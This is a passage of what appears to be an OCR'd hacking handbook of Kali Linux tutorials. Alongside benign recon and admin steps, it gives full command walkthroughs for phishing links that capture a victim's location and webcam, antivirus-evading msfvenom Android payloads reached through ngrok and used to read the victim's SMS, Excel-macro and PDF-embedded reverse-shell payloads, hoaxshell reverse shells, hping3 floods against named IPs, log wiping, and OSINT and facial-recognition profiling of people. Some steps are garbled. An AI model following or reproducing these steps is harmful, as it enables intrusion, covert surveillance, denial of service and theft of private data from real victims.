Code: set port 4446

15: Check Options.

Code: options
 170

16: Run it.

Code: run
 171

How to Hack Webcam, Microphone and

get Mobile Location using a Link

1: Clone Storm Breaker.

Code: git clone
https://github.com/ultrasecurity/Storm-
Breaker.git

2: Go to Strom Breaker Directory.

Code: cd Strom-Breaker

3: Install.sh.
Code: sudo bash install.sh

4: Install requirements.
 172

Code: sudo python3 -m pip install -r

requirements.txt

5: Run Strom Breaker.

Code: sudo python3 st.py
 173

6: For Device, Location use Get Location

Number 1.
Code: 1
7: Open Link: http://localhost:2897 in your Kali
Linux browser.
 174

8: For ngrok uses go to the ngrok directory.

9: Run ngrok on Port 2897.

Code: ./ngrok http 2897

10: Copy the ngrok link and send it to your

mobile.
Ngrok link: https://56be-45-116-232-
42.in.ngrok.io
 175

11: After someone clicks your link the weather

picture will appear on the screen like this and
also click on change location.
 176

12: You will see the location and other details.

 177

13: Open the google map link and see the

location.
 178

DNS Enumerate

1: DNS Enumeration.
Code: dnsenum google.com
 179

How to Enumerate SNMP

1: Find PC IP Address in CMD.

Code: ipconfig

2: Check SNMP working on PC IP Address.

Code: nmap -p 161 -sU 192.168.43.2

3: SNMP Port is 161.

4: If SNMP is open.

5: Use msfconsole.
Code: msfconsole
 180

6: Search SNMP in msfconsole.

Code: search snmp

7: SNMP no is 25.
Code: use 25
 181

8: Check options.
Code: show options

9: Set RHOSTS.
Code: set RHOSTS 192.168.43.3

10: RHOSTS is set.

 182

11: Run it.

Code: run
 183

Web Cam Hacking using CamPhish

1: Git clone CamPhish.

Code: git clone
https://github.com/techchipnet/CamPhish.git

2: Go to the CamPhish directory.

Code: cd CamPhish

3: Run CamPhish.
Code: bash camphish.sh
 184

4: Use the Ngrok server.

Code: 1

5: Go to Live YouTube TV.

Code: 2

6: Give Youtube watch ID.

 185

7: Open the Direct link in the browser.

8: If CamPhish wants ngrok authtoken they give

it.
 186

NIKTO Web vulnerability scanner tool

for Kali Linux

1: Find vulnerabilities.
Code: nikto -h example.com -Tuning 9

2: Save the nikto details in the file.

Code: nikto -h https://example.com -output
/root/Desktop/filename -Format html
 187

Practically Perform Vulnerability

Assessment

1: Install Zaproxy.
Code: apt-get install zaproxy

2: Run Zaproxy.
Code: zaproxy

3: You can Zaproxy manual in the search.

4: Update all packages.

5: Go to Automated Scan.

6: Paste the website URL into the URL to Attack.

 188

7: You can use the phptest vulnweb website for

penetration or scanning.
Website: http://testphp.vulnweb.com/

8: Click on Attack.

9: Correct Mark the Use ajax spider option.

10: Add AJAX Spider, Active Scan, and Fuzzer.

 189

11: You can check vulnerabilities in Alerts.

 190

MAC Changer in Shell Scripting

1: Check Mac Address.

Command: ifconfig
Command: macchanger -s eth0

2: ether 00 is Mac Address.

Code: 08:00:27:ed:29:83

3: Close eth0.
Code: ifconfig eth0 down
 191

4: Change Mac Address (I change 83 into 84).

Code: ifconfig eth0 hw ether 08:00:27:ed:29:84

5: Start eth0.
Code: ifconfig eth0 up

6: Check Change Mac Address.

Code: ifconfig

7: This Mac Changer option is not permanent

you can do it whenever you open Kali Linux.
 192

8: Create a Mac Changer Permanent file.

Code: gedit Mac.sh

9: Paste this code into gedit Mac.sh.

Code: #!/bin/bash

ifconfig eth0 down

ifconfig eth0 hw ether 08:00:27:ed:20:83
ifconfig eth0 up

ifconfig eth0 down

ifconfig eth0 hw ether 08:00:27:ed:20:83
ifconfig eth0 up
ifconfig
 193

OR
#!/bin/bash

read mac
ifconfig eth0 down
ifconfig eth0 hw ether $mac
ifconfig eth0 up

ifconfig eth0 down

ifconfig eth0 hw ether $mac
 194

ifconfig eth0 up
ifconfig

10: Run Mac.sh.

Code: ./Mac.sh

11: Enter Mac Address then run.

08:00:27:ed:20:83
12: Giver Permissions to Mac.sh.
Code: chmod +x Mac.sh
 195

13: Run Mac.sh.

Code: ./Mac.sh

14: Check the Mac Address change.

Command: ifconfig
Command: macchanger -s eth0

15: Change Mac Address Manually (Not Valid).

Command: macchanger -r eth0
 196

16: Mac Changer Lists.

Command: macchanger -l

17: Save the Mac Changer list in a file.

Command: macchanger -l > vendor.txt

18: Show Mac Changer lists.

Command: cat vendor.txt

19: Check Mac Changer list records.

Command: wc -l vendor.txt

20: Find out records.

Command: shuf -n 1 vendor.txt
 197

21: Show only Mac Address.

Command: shuf -n 1 vendor.txt | awk '{ print $3
}'

How to Enumerate NetBIOS

 198

1: Copy the IP Address from Metasploitable 2.

Code: ifconfig

2: Check IP Address is up or down.

Code: ping 192.168.43.235

3: Scan IP Address.
Code: nmap 192.168.43.235 -sV -vv -p 130-140

4: Port 139 is open.

5: Run port 139 which is open.

 199

Code: nmap 192.168.43.235 -vv -p 139 --

script=nb*

OR

Code: nbtscan 192.168.43.235 -v

Code: nbtscan 192.168.43.235 -v -h

 200

How to Enumerate NFS (Network File

System)

1: Use Metasploitable Machine for IP Address.

Code: ifconfig

2: Find NFS.
Code: nmap -sT -sV -vv 192.168.43.235

3: NFS may be present.

 201

4: Scan Port 111.

Code: nmap -p 111 192.168.43.235 --script=nfs*

5: Create a folder on the Desktop.

6: Find the exact location so take the

NFS folder and throw it in the terminal.

7: Mount it.
Code: mount -t nfs 192.168.43.235:/
/home/kakar/Desktop/NFS

8: Open the NFS folder to see all details.

 202

E: dpkg was interrupted, you must

manually run 'sudo dpkg --configure -a'
to correct the problem.

1: Paste this code into the terminal.

Code: sudo dpkg --configure -a
 203

Shared Clipboard Text Windows to kali

Linux host in Virtual Box | Copy, and
Paste Windows to Kali Linux

1: Follow these steps in the virtual box.

204
 205

How to avoid anonymity leaks? Stay

anonymous

1: You can download all dependencies with the

following command or check if they are up to
date.

Code: sudo apt update && sudo apt install tar

tor curl python3 python3-scapy network-
manager

2: Clone whoami.
Code: git clone
https://github.com/owerdogan/whoami-
project.git

3: Go to the whoami directory.

 206

Code: cd kali-whoami

4: Install makefill.
Code: sudo make install
5: whoami help.
Code: sudo kali-whoami --help

6: Start whoami.
Code: sudo kali-whoami --start
 207

7: If you want to activate features select the

number and enter it.
Code: 1 or 2,3,4,5 etc
 208

8: After the selection of features, you will the

see tik mark.

9: If you want to disable features just type the

number and enter it.

10: After selecting all features just enter to start

it.

11: Check whoami status.

Code: sudo kali-whoami --status

12: Stop whoami.

Code: sudo kali-whoami --stop
 209

Remotely Control an Android Device

1: Git clone AndroRAt.

Code: git clone
https://github.com/karma9874/AndroRAT.git

2: Go to the AndroRAT directory.

Code: cd AndroRAT

3: Install requirements.
Code: pip3 install -r requirements.txt
 210

email, and domain using OSiNT Tool

1: Git clone Profil3r.

Code: git clone
https://github.com/MrNonoss/Profil3r-
docker.git

2: Go to the Profil3r directory.

Code: cd Profil3r-docker

3: Install packages.
Code: sudo python3 setup.py install
 211

How to Create a Remote Access Trojan

(RAT)

1: Clone FatRat.
Code: git clone
https://github.com/screetsec/TheFatRat.git

2: Go to the FatRat directory.

Code: cd TheFatRat

3: Give execute permissions to setup.sh.

Code: chmod +x setup.sh

4: Run setup.sh.
Code: ./setup.sh
 212

5: Click on Install Backdoor-Factory from Kali

Repository.
Code: 2

6: Give execute permissions to chk_tools.

Code: chmod +x chk_tools

7: Check software if not installed

Code: ./chk_tools
 213

Enumeration - How to Enumerate SMTP

1: Use Metasploitable2 IP Address.

2: Scan the IP Address and find SMTP Port.

Code: nmap -sT -sV 192.168.43.235

3: Here is SMTP Port is open.

4: Scan SMTP Port.

Code: nc -nv 192.168.43.235 25
 214

Or

Code: telnet 192.168.43.235 25

5: Mention Gmail Address.

Code: VRFY simple@gmail.com

6: Scan SMTP.
Code: nmap -p 25 192.168.43.235 -sC
 215

How to Change Private IP using shell

Program

1: Create an IPc.sh file.

Code: gedit IPc.sh

2: Check current IP.

Code: ifconfig

3: Change IP Manually.
Code: ifconfig eth0 192.168.78.140
 216

4: Check IP now.
Code: ifconfig

5: Change IP permanently.
Code: #!/bin/bash

read ip
ifconfig eth0 $ip
ifconfig
 217

6: Save the file.

7: Give execute permissions to the IPc.sh file.

Code: chmod +x IPc.sh

8: Change IP.
 218

9: If you want only an IP Address.

10: Open the IPc.sh file.

Code: gedit IPc.sh

Paste this code:

#!/bin/bash

read ip
ifconfig eth0 $ip
 219

ifconfig | grep inet

Or

#!/bin/bash

read ip
ifconfig eth0 $ip
ifconfig | grep $ip
 220

11: Save it.

12: Run the IPc.sh file.

Code: ./IPc.sh
 221

Clear All Logs from Windows and Linux

1: For windows Download SourceForge.

Website:
https://sourceforge.net/projects/clearlogs/

2: For Linux Go to /var/log.

Code: cd /var/log

3: Check all logs.

Code: ls

4: Open logs.
Code: pluma file name
Example: pluma macchanger.log
 222

5: If you want to remove logs.

Code: rm -r logs name

6: Clear all logs with one click.

Code: rm -rf *
 223

Monitor Mode Switcher Using Shell

Scripting

1: Create a monitor.sh file.

Code: gedit monitor.sh

2: Write this code.

Code: #!/bin/sh

echo "For monitor mode press 1"

read no

monit() {
ifconfig wlan0 down

iwconfig wlan0 mode monitor

 224

ifconfig wlan0 up

iwconfig
}

if [ $no -eq 1 ]
then
echo "Switching to Monitor Mode"
monit
else
echo "Wrong Input"
fi
 225

3: Give execute permissions.

Code: chmod +x monitor.sh

4: Run monitor mode.

Code: ./monitor.sh

5: Type 1.
 226

How to Remove Rootkits from Our

Devices

1: Rookit help.
Code: chkrootkit --help

2: Run Rootkit.
Code: chkrootkit

3: Use rkhunter.
Code: rkhunter

4: Run rkhunter.
Code: rkhunter -c
 227

Advanced Hacking with Nmap

1: Scan Website.
Code: nmap -sV testphp.vulnweb.com -O --
script vuln
 228

How to Remove Cache Files

1: Install bleachbit.
Code: apt-get install bleachbit

2: Open bleachbit (as root).

3: Select Cache files and clear them.

 229

How to Create Payload

1: Find msfvenom payloads.

Code: msfvenom -l payloads

2: Copy android/meterpreter/reverse_tcp from

payload lists.
Code: android/meterpreter/reverse_tcp

3: Generate Payloads.
Code: msfvenom -p
android/meterpreter/reverse_tcp
LHOST=192.168.43.247 LPORT=8888 >
walikhankakar.apk

4: Here Payload is created now.

 230

5: Go to Virus Total Website.

Website:
https://www.virustotal.com/gui/home/upload

6: Insert apk file and check the virus in apk file.

7: Virus detected by Anti-Virus software.

 231

8: Check msfvenom encoders lists.

Code: msfvenom -l encoders

9: Use php/base64 encoder.

Code: msfvenom -p
android/meterpreter/reverse_tcp
LHOST=192.168.43.247 LPORT=8888 >
walikhankakar.apk -e php/base64
 232

10: Check apk file again on Virus total website.

11: Know Anti-Virus cannot detect payloads in

apk files.
 233

How Hackers Hack Your Phone Remotely

1: Go to the Ngrok website.

Website: https://ngrok.com/

2: For signing, you can use Temp mail.

Website: https://temp-mail.org/en/

3: Download Ngrok for Linux and extract them.

4: After installation of Ngrok copy Connect your

account authtoken code.
The code looks like this: ngrok config add-
authtoken
8GyRtVj6X4960jgmve1LdcMC9sVL_8d9e03Cank
p
 234

5: Execute Ngrok.
Code: ./ngrok authtoken
10dsJV5diughoicidcMC9sVL_0d9onGCankp8GyR
tnvlie

6: Start Ngrok.
Code: ./ngrok tcp 5252

7: Copy 0.tcp.in.ngrok.io.
 235

8: Create payload.
Code: msfvenom -p
android/meterpreter/reverse_tcp
LHOST=0.tcp.in.ngrok.io LPORT=13240 >
apkname.apk

9: Here apk payload is created.

 236

10: Start msfconsole.

Code: msfconsole

11: Use exploit/multi/handler.

Code: use /exploit/multi/handler

Code: set payload

/android/meterpreter/reverse_tcp

Code: set LHOST 127.0.0.1

Code: set LPORT 5252

Code: set ExitOnSession false

 237

12: Check payload options.

Code: show options

13: Run apk file.

Code: run -j or exploit -j

14: Check sessions.

 238

Code: sessions -i
15: Select sessions.
Code: sessions -i 1

16: Check Victims apps.

Code: app_list

17: For more details check help.

Code: help

18: For apk sharing, you can use your own

Whatsapp or WeTransfer website.
Website: https://wetransfer.com/

: Check SMS.
Code: dump_sms
 239

How to Perform DoS Attack

1: Copy the IP Address from Metasploitable2.

Code: ifconfig

2: use higping3.
Code: hping3 -S 142.250.181.179 -a
192.168.43.247 -p 22 --flood

3: 142.250.181.179 is the target IP (Kali Linux).

4: 192.168.43.247 Attacker IP (Website).

5: Check metasploitable2 usage.

Code: top
 240

Install and use GR-GSM

1: Go to kali tweaks.
Code: kali-tweaks

2: Go to Network Repositories.

3: Select experimental.
 241

4: Apply and ok it.

5: Quite it.

6: Install gr-gsm.
Code: apt install gr-gsm

7: You can use gr-gsm devices.

8: Buy Now on Amazon

 242

rtl-sdr: https://amzn.to/3U3SBzq
rtl-sdr: https://amzn.to/3NxCyaP
 243

9: Connect to the system.

Code: lsusb

10: Start gr-gsm.

Code: sudo grgsm_livemon

11: For frequency set it.

Code: sudo grgsm_livemon -f 02935
 244

Password Protect GRUB Boot Loader

1: Generate a Password.
Code: grub-mkpasswd-pbkdf2

2: Enter Password.
Password: Kakar

3: Here Hash is generated.

4: Copy Hash.
 245

Hash:
grub.pbkdf2.sha512.10000.967170B5367FB045
1E7CB8AC39D07AB65542E5776B5EB9ADE031E
D84C211E531F083664D56105AFBD9198B5BE1
66ED57CC1DE4329AD23C5D20BC78ADC983CD
B0.CCB6A151ABED84ED4D1D02ECEBAD7FB6A7
501ABCABF21890D4C3EAA40AE9D198936E183
9ECAB8F735707AA1C7476F9A3358262EB80204
A8FC3E6924AB861410A

5: Go to the grub file.

Code: nano /etc/grub.d/00_header

6: Go to rub_lang=`echo $LANG | cut -d . -f 1`.

Code: nano rub_lang=`echo $LANG | cut -d . -f
1`
 246

7: Paste this code.

Code: cat <<EOF
set superusers="kakar"
 247

password_pbkdf2 kakar
grub.pbkdf2.sha512.10000.967170B5367FB045
1E7CB8AC3>
EOF

8: Update changes in the grub folder.

Code: sudo update-grub

9: Reboot the system.

Code: sudo reboot
 248

What is Podman? Use Kali Linux on

Windows 11

1: Go to Podman Github.
Website:
https://github.com/containers/podman/release
s

2: Download the Podman file.

 249

3: Install in windows.

4: Install Podman.

5: Install the Podman machine in the command

prompt.
Code: podman machine init

6: Check the Podman machine list in the

command prompt.
Code: podman machine list

7: Start the Podman machine in the command

prompt.
Code: podman machine start
 250

8: Open kali Linux in Podman.

Code: podman run --tty --interactive kali-rolling

How Hackers can own your system

1: Clone Unicorn.
Code: git clone
https://github.com/trustedsec/unicorn.git

2: Go to the Unicron directory.

Code: cd unicorn

3: Unicorn help.
Code: python3 /usr/share/unicorn-
magic/unicorn.py --help

4: Set Attacker (System) IP.

 251

Code: ifconfig | grep inet

IP: 192.168.43.247

5: Create payload.
Code: python3 /usr/share/unicorn-
magic/unicorn.py
windows/meterpreter/reverse_http
192.168.43.247 80 macro

6: Here is the unicorn payload generated.

 252

7: Start msfconsole.
Code: sudo msfconsole -r unicorn.rc

8: Copy the powershell_attack.txt folder and

paste it into ms excel.

9: Open VBA in ms excel.

Key: Alt + F11

10: Go to Insert = Module and paste the

powershell_attack.txt folder.
 253

11: Close the VBA and save the file.

12: Check sessions.

Code: sessions

13: Open sessions.

Code: sessions -i 1

14: Load extension.

Code: load stdapi

15: System info.

 254

Code: sysinfo
 255

CSI Installation | A Perfect OS for Cyber

Security and Cyber Crime Investigation

1: Go to the CSI Linux website.

Website: https://csilinux.com/download

2: Open CSI Linux in Virtual Box Machine

manually.
 256

3: Click on import.

4: Start CSI Linux and Enjoy it.

5: CSI Linux Default Password.

Code: csi
 257

Setup Web Pentesting Lab for Bug

Hunting

1: Update Packages.
Code: apt update

2: Set Pentesting Lab for Bug Hunting.

Code: apt install kali-linux-labs

3: Start dvwa.
Code: dvwa-start

4: DVWA login.
Code: dvwa

5: DVWA Password.
 258

Code: dvwa
6: DVWA database sitting.
Code: /etc/dvwa/config/config.inc.php

7: Vulnerable Web Application Admin.

Code: admin

8: Vulnerable Web Application Password.

Code: password

9: How to stop DVWA.

Code: dvwa-stop

10: Start juice-shop.

Code: juice-shop
 259

11: How to stop juice-shop.

Code: juice-shop-stop
 260

How to Perform DDoS Attacks

1: Copy Website IP (Victim IP).

Code: 192.168.192

2: Start DDoS Attack on the website.

Code: hping3 --flood --rand-source
185.151.30.105
 261

Sock Puppet hackers technique for

OSINT

1: Open Linux case.

2: Start a case.

3: Start New Case.

4: Click on Sock Puppet Generator.

 262

5: Know Sock Puppet Generator is generated.

6: Fake Name Generator Website.

Website:
https://www.fakenamegenerator.com/

7: For Fake Pictures.

 263

Website: https://thispersondoesnotexist.com/

8: Anonymous Email.
Website: https://proton.me/
 264

How to install Spiderfoot

1: Install Spiderfoot.
Code: git clone
https://github.com/smicallef/spiderfoot.git

2: Go to the Spiderfoot directory.

Code: cd spiderfoot

3: Install Spiderfoot packages.

Code: pip install -r requirements.txt

4: Start Spiderfoot.
Command: python3 ./sf.py -l 127.0.0.1:5001
Command: spiderfoot -l 127.0.0.1:1000
 265

5: Copy the Spiderfoot link and paste it into the

browser.
Link: http://127.0.0.1:5001/
Link: 127.0.0.1:1000

6: Scan your website.

7: Spiderfoot help.
Command: spiderfoot -h
 266

How to find social media accounts by

username

1: Install sherlock.
Code: git clone https://github.com/sherlock-
project/sherlock.git

2: Go to the sherlock directory.

Code: cd sherlock

3: Install sherlock requirements.

Code: python3 -m pip install -r requirements.txt

4: Find social media users.

Code: python3 sherlock kakarstore
 267

: Hide your privacy and search users.

Code: python3 sherlock -t kakarstore

6: Scan the s name in deep.

Code: python3 sherlock --print-all kakarstore
 268

Mapping Social Media Profiles with

Facial Recognition using Social Mapper

1: Install Social Mapper.

Code: git clone
https://github.com/Greenwolf/social_mapper.gi
t

2: Install geckodriver check page number 152.

3: Copy geckodriver.
Code: cp geckodriver /usr/bin/

4: Install these packages.

Code: sudo apt-get install build-essential cmake
 269

Code: sudo apt-get install libgtk-3-dev

Code: sudo apt-get install libboost-all-dev

5: Go to the Social Mapper directory.

Code: cd social_mapper/setup/

6: Install requirements.
Code: python3 -m pip install --no-cache-dir -r
requirements.txt

7: Check Mac packages.

Code: mac setup-mac.txt

8: Open the social mapper file.

Code: nano social_mapper.py
 270

9: File the social media accounts details in the

social mapper file.

10: Scan Pictures.

Code: python social_mapper.py -f imagefolder -
i /home/kakar/social_mapper/Input-
Examples/imagefolder/ -m fast -tw
 271

Trape: easily track location, IP, OS,

Browser of people, and browser hooking

1: Install Trape.
Code: git clone
https://github.com/jofpin/trape.git

2: Go to the Trape directory.

Code: cd trape

3: Install trape requirements.

Code: pip install -r requirements.txt

4: Run trape.
Code: python3 trape.py --url
http://kakarstore.com --port 8080
 272

5: Open Your Access key in the browser.

 273

Recon-ng Web Reconnaissance

Framework | Trace location, Pushpin,
Images

1: Start Recon-ng.
Code: recon-ng

2: Check modules.
Code: show modules

3: Check the API keys list.

Code: keys list

4: Check recon-ng help.

Code: help
 274

5: Check workspaces.
Code: show workspaces

6: Create workspaces.
Code: workspaces create kakarstore

7: Check the workspaces list.

Code: workspaces list
 275

HTTrack website copier: How to clone

any website | extract website data

1: Start HTTrack.
Code: httrack

2: Write the project name.

3: Base path (return=/root/websites/) means

(Where to save the files).
Code: /home/kakar/Desktop/

4: Add a website.
Code: https://www.kakarstore.com
 276

How to easily setup web Pentesting lab on

localhost for bug bounty

1: Install PentestLab.
Code: git clone
https://github.com/eystsen/pentestlab.git

2: Go to the PentestLab directory.

Code: cd pentestlab

3: Install Docker.
Code: sudo apt install docker.io

4: Check PentestLab list.

Code: ./pentestlab.sh list
 277

5: Set up vulnerablewordpress on localhost.

Code: ./pentestlab.sh start vulnerablewordpress

6: Setup procedures are the same.

7: If you want to stop the vulnerablewordpress

setup.
Code: ./pentestlab.sh stop vulnerablewordpress
8: Start bwapp.
 278

Code: ./pentestlab.sh start bwapp

9: Start webgoat8.
Code: ./pentestlab.sh start webgoat8

10: Start dvwa.

Code: ./pentestlab.sh start dvwa

11: You can start dvwa on Public IP.

Code: ./pentestlab.sh startpublic dvwa

12: You can also set up dvwa on other IP

Addresses and ports.
Code: ./pentestlab.sh startpublic dvwa
192.168.23.43 8080
 279

Hollywood-style terminal emulator

1: Download eDEX-UI.
Website: https://github.com/GitSquared/edex-
ui

2: Go to the Downloads directory.

 280

3: Give permissions to eDEX-UI.

4: Tick mark on allow this file to run as a

program.
 281

5: Start eDEX-UI.
 282

Fully Anonymize Your System with Tor

Network Gateway using Nipe

1: Install Nipe.
Code: git clone
https://github.com/htrgouvea/nipe.git

2: Go to the Nipe directory.

Code: cd nipe

3: Install libs and dependencie.

Code: sudo cpan install Try::Tiny Config::Simple
JSON

4: Install nipe.pl.
Code: ./nipe.pl install
 283

5: Start nipe.pl.
Code: perl nipe.pl start

6: Check nipe.pl status.

Code: perl nipe.pl status

7: If you want to change your IP Address.

Code: perl nipe.pl restart

8: If you want to stop nipe.pl.

Code: perl nipe.pl stop
 284

METADATA (Hidden information of

website download public documents)

1: Install Metagoofil.
Command: git clone
https://github.com/laramies/metagoofil.git
Command: apt install metagoofil

2: Scan hidden information.

Command: metagoofil -d kakarstore.com -t
doc,pdf,xls -l 100 -n 20 -o
/home/kakar/Desktop/kakarstorefiles -f
 285

Create a static name for the dynamic IP

address for access localhost from
anywhere

1: Go to Duck DNS official website and sign in.

Website: https://www.duckdns.org/

2: Create subdomains.

3: Go to Install Manu.
 286

4: In OS select Linux cron.

5: If your linux install is running a crontab, then

you can use a cron job to keep updated.
Command: ps -ef | grep cr[o]n

6: If this returns nothing - then go and read up

on how to install cron for your distribution of
linux.
 287

Also confirm that you have curl installed, test

this by attempting to run curl.
Command: curl

7: If this returns a command not found like error

- then find out how to install curl for your
distribution.

Otherwise, get started and make a

directory to put your files in, move into it and
make our main script.

8: Make a Duck DNS directory.

Command: mkdir duckdns

9: Go to the Duck DNS directory.

 288

Command: cd duckdns

10: Create a file.

Command: nano duck.sh

11: Now copy this text and put it into the file (in
nano you hit the I key to insert, ESC then u to
undo) you must change your token and domain
to be the one you want to update.
You can pass a comma-separated (no spaces)
list of domains.
You can if you need to hard code an IP (best not
to - leave it blank and we detect your remote
ip).
Hit ESC then use the arrow keys to move the
cursor x deletes, and I put you back into insert
mode.
 289

Command: echo
url="https://www.duckdns.org/update?domains
=kakarstore&token=4ca4010f-785e-46f2-9ef8-
742b80976918&ip=" | curl -k -o
~/duckdns/duck.log -K -

12: Justify this file.

Command: Ctrl + j

13: Save it.

 290

Command: Ctrl + o
Command: Enter
Command: Ctrl + x

14: Now make the duck.sh file executable.

Command: chmod 777 duck.sh
15: We will be using the cron process to make
the script get run every 5 minutes.
Command: crontab -e

16: Copy this text and paste it at the bottom of

the crontab.
Command: */5 * * * * ~/duckdns/duck.sh
>/dev/null 2>&1
 291

17: Save the file.

Command: Ctrl + o
Command: Enter
Command: Ctrl + x

18: test the script.

Command: ./duck.sh

19: If it is KO check your Token and Domain are

correct in the duck.sh script.
Command: cat duck.log
 292

Host your own fast OSiNT username

search web-server

1: Install Blackbird.
Command: git clone
https://github.com/p1ngul1n0/blackbird.git

2: Go to Blackbird.
Command: cd blackbird

3: Install Blackbird requirements.

Command: pip install -r requirements.txt

4: Check site lists.

Command: python3 blackbird.py --list-sites
 293

5: Search username.
Command: python3 blackbird.py -u kakarstore

6: Start Webserver.
Command: python3 blackbird.py web

7: Open the webserver link.

The website Link looks like this:
http://127.0.0.1:9797/
 294

8: Check username.
 295

Social Engineering Toolkit (SET)

1: Open Social Engineering Toolkit (SET) which is

installed default in Kali Linux.

2: Start social engineering toolkit.

Command: setoolkit
 296

Discover and extract hostnames of target

IP addresses

1: Upgrade packages.
Command: apt upgrade

2: Install hosthunter.
Command: hosthunter

3: Check hosthunter help.

Command: hosthunter -h

4: Check IP hostname.
Command: hosthunter -t 185.151.30.175 -f txt -
o kakarstore
 297

5: Check the IP hostname file.

Command: cat kakarstore

6: For multiple IPs first create a file of multiple

IPs.

7: Go to the Desktop directory and save the

ip.list file.
Command: cd Desktop

8: Scan multiple IP files.

Command: hosthunter ip.list -b

9: -b means Bing.
 298

Information Gathering | DNS-ENUM

1: Go to the Kali Linux search bar.

2: Information Gathering - DNS Analysis

dnsenum.
Command: dnsenum

3: Scan Website.
Command: dnsenum --dnsserver 8.8.8.8
kakarstore.com
 299

4: DNS-ENUM help.
Command: dnsenum -h
 300

Information gathering | DNS-RECON

1: Open dnsrecon.
Command: dnsrecon

2: DNS-RECON help.
Command: dnsrecon -h

3: Scan website DNS.

 301

Command: dnsrecon -d kakarstore.com

Command: dnsrecon -d kakarstore.com -f -a -s -
y
 302

Information Gathering | IDS and IPS

Identification lbd

1: Open lbd.
Command: lbd

2: lbd - load balancing detector.

3: Checks if a given domain uses load balancing.

 303

Command: lbd kakarstore.com

 304

Information Gathering | IDS and IPS

Identification - wafw00f

1: Open wafwa00f.
Command: wafw00f

2: wafwa00f help.
Command: wafw00f -h
 305

3: Scan website.
Command: wafw00f
https://www.kakarstore.com
 306

using dmitry

1: Dmitry help.
Command: dmitry

2: Scan for the full information.

Command: dmitry -oiwnsepf -o
/home/kakar/Desktop/kakarstore.txt
kakarstore.com
 307

Website nameserver information

nslookup

1: Find website name server information.

Command: nslookup kakarstore.com
 308

whois lookup

1: Scan website details.

Command: whois kakarstore.com
 309

Metasploit

1: Run Metasploit.
Command: msfconsole

2: Run manually in kali linux.

Go to: Exploitation Tool Metasploit framework
 310

3: Metasploit help.
Command: help
 311

Hydra

1: Hydra help.
Command: hydra -help

2: Open Hydra manually in kali linux.

Go to: Password Attacks Online Attacks -
Hydra
 312

What is the Payload

1: Run setoolkit.
Command: setoolkit

2: Select 1 for Social-Engineering Attacks.

Command: 1
 313

3: Select 1 Spear-Phishing Attack Vector.

Command: 1

4: Select 2 for Create a FileFormat Payload.

Command: 2
 314

5: Select 13 Adobe PDF Embedded EXE Social

Engineering.
Command: 13
 315

6: Create a new PDF File Select 2.

Command: 2

7: Select 2.
Command: 2
 316

8: Check Kali Linux IP are the same as LHOST.

Command: ifconfig
 317

9: Enter it.

10: Connect Port.

Command: 4444
 318

11: Rename the PDF File name.

Command: 2
New Filename: kakarstorepdf

12: Exit it.

Command: exit
 319

Command: exit
Command: no

13: Return to Main Menu.

Command: 99
Command: 99
Command: 99

14: Clear the terminal.

Command: clear

15: Where is the malicious pdf saved?

 320

Command: cd /root/.set/
Command: ls

16: Convert Malicious file kakarstorepdf into

PDF.
Command: mv kakarstorepdf kakarstorepdf.pdf

17: Move Malicious file on Desktop.

 321

Command: mv kakarstorepdf.pdf
/home/kakar/Desktop/

18: Open the pdf file on a

personal pc for this pdf file to open it.

19: After opening the pdf file now open

msfconsole.
Command: msfconsole

20: Follow this command in msfconsole.

Command: use exploit/multi/handler

21: Set payloads.

Command: set payload
windows/meterpreter/reverse_tcp
 322

22: Go to Show options.

Command: show options

23: Copy Kali Linux IP.

Command: ifconfig

24: Set IP.

Command: set LHOST 192.168.43.247

25: Know to check IP (LHOST) and LPORT.

Command: show option
 323

26: Run it.

Command: run
 324

Lynis: Perform Security Auditing and

Vulnerability Analysis

1: Install Lynis.
Command: git clone
https://github.com/CISOfy/lynis.git

2: Go to the lynis directory.

Command: cd lynis/

3: Give Executable permissions.

Command: chmod +x lynis

4: Start System Audit.

Command: ./lynis audit system
 325

How Hackers control your PC

1: Install Hoaxshell.
Command: git clone
https://github.com/t3l3machus/hoaxshell.git

2: Go to the hoax-shell directory.

Command: cd hoaxshell

3: Install hoax-shell requirements.

Command: pip3 install -r requirements.txt

4: Give Executable permissions.

Command: chmod +x hoaxshell.py

5: Run hoaxshell.
 326

Command: ./hoaxshell.py

6: Try your system copy system IP.

Command: ifconfig

8: Run it.
Command: ./hoaxshell.py -s 192.168.43.247

9: Generate reverse shell payload.

10: Copy Generate payload and paste it into

Command Prompt.
 327

11: Check the reverse shell.

Command: net user

12: Check whoami.

Command: whoami

13: Print Working Directory.

Command: pwd
 328

14: Going back.

Command: cd ..

15: Go to Desk.
Command: D:

16: Check D Directory.

Command: dir
 329

Run Multiple Linux OS Inside the Terminal

with GUI Tools

1: Install Podman.
Command: apt install podman

2: Install DISTRO BOX.

Command: curl -s
https://raw.githubusercontent.com/89luca89/di
strobox/main/install | sudo sh

3: Check Distro Box commands.

Command: distrobox

4: Install Fedora OS the root.

Command: distrobox-create -n fedora --image
fedora :latest
 330

Command: distrobox-create -n fedora --image

fedora :37

5: Check distrobox list.

Command: distrobox-list

6: Run fedora.
Command: distrobox-enter fedora

7: Check fedora information.

Command: cat /etc/os-release

8: Install neofetch in fedora.

Command: sudo yum install neofetch

9: Run neofetch.
 331

Command: neofetch

10: Logout from fedora.

Command: logout

11: Install kali-rolling the root

terminal.
Command: distrobox-create -n kali --image kali-
rolling:latest
 332

12: Check Lists.

Command: distrobox-list

13: Start Kali.

Command: distrobox-enter kali

14: Kali Information.

Command: cat /etc/os-release

15: Install Neofetch, Firefox, and Guymager.

Command: sudo apt install neofetch firefox-esr
guymager

16: Run Neofetch.

Command: neofetch
 333

17: Run Firefox.

Command: firefox

18: Run Guymager.

Command: sudo guymager

19: Install Centos.

Command: distrobox-create -n centos --image
centos:latest

20: Check Lists.

Command: distrobox-list

21: Stop fedora if you want.

Command: distrobox-stop fedora
 334

22: If you want to remove containers.

Command: distrobox-rm centos
 335

How can hackers take control of your PC

1: Check the current IP Address.

Command: ifconfig eth0 | grep inet

2: Create Metasploit.
Command: msfvenom -p
windows/shell_hidden_bind_tcp
ahost=192.168.43.111 lport=4444 -f exe >
kakarstore.exe

3: Convert kakarstore.exe into txt.

Command: cp kakarstore.exe kakarstore.txt

4: Create a PHP web server.

Command: php -S 192.168.43.111:80
 336

5: Copy the kakar.txt file and kakar.exe and

paste them into windows.

6: Open kakar.txt file or kakar.exe in windows.

7: If not open because of window defenders

then copy these files to USB.
 337

Bettercap Framework

1: Install Bettercap.
Command: bettercap

2: Bettercap help.
Command: bettercap -h

3: Start Bettercap.
Command: bettercap

4: How to use it.

 338

Command: help

5: Check Module Help.

Example: help net.probe

6: Start Module.
